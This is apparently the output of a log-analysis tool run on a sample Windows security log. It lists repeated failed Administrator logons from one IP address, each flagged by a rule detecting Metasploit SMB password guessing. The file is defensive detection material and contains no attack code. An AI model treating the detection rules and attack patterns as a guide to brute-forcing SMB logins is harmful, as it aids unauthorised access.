NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
